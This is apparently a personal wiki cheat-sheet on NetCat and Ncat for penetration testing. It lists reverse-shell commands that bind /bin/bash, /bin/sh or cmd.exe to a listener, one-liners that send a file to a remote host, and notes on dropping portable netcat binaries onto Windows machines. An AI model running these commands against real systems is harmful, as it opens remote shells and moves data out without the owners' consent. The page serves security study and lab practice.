====== NetCat (nc) ======

NetCat is a popular **remote access tool.**
  * It has a small footprint so it's portable.
  * It can set up a reverse shell easily... 

Local listener for reverse shell: 

<code>
nc -nvlp [port number]
# -n  numeric-only IP addresses, no DNS
# -v  verbose (twice for more verbose)
# -l  listen mode, for inbound connects
# -p  port number
</code>

Connect to that listener: 

<code>
# For Linux (either or):
nc [listener IP] [port] –e /bin/bash
nc [listener IP] [port] –e /bin/sh

# For Windows:
nc.exe [listener IP] [port] –e cmd.exe
</code>

Connect to FTP port (21) to check version of FTP server: 

<code>nc [target IP] 21</code>

Send output from a listener to a text file:

<code>
nc -nvlp [port number] > filename.txt
</code>

Send output from a text file to a remote machine: 

<code>
nc [IP Address] [port] < filename.txt
</code>

----

===== NetCat Download =====

==== Simple & Easy ====

**Initial:** {{ :downloads:netcat-win32-1.11.zip | netcat 1.11 }} compiled for both 32 and 64-bit Windows.

**Update:** {{ :downloads:netcat-win32-1.12.zip | netcat 1.12 }} adds ''-c'' command-line option to send CRLF line endings instead of just CR (eg. to talk to Exchange SMTP) 

I used 1.12 on Windows 7 and it was drop-and-use. 
  * Dropped the zip into Winders, unzipped, reverse shell back to my Kali box. 
  * No tweaking necessary.

**Source**: [[https://eternallybored.org/misc/netcat/ | eternallybored.org]] (much thanks)

---- 

====== Ncat ======

[[https://nmap.org/ncat/ | Ncat]] is a much-improved reimplementation of the Netcat. 
  * I has a variety of different capabilities... 
  * SSL
  * Proxies
  * SendMail
  * Chain together Ncat sessions for pivoting.

If you need a statically compiled version of ncat.exe that you can just drop on a Windows system and use without having to run any installer or copy over extra library files: [[https://nmap.org/dist/ncat-portable-5.59BETA1.zip | Ncat 5.59BETA1]] ({{ :downloads:ncat-portable-5.59beta1.zip | local download }})

To ensure the file hasn't been tampered with, you can check the [[ https://nmap.org/book/install.html#inst-integrity | cryptographic signatures ]]. 

If you need a portable version of a newer Ncat release, see the [[ https://secwiki.org/w/Nmap/Ncat_Portable | Ncat portable compilation instructions]].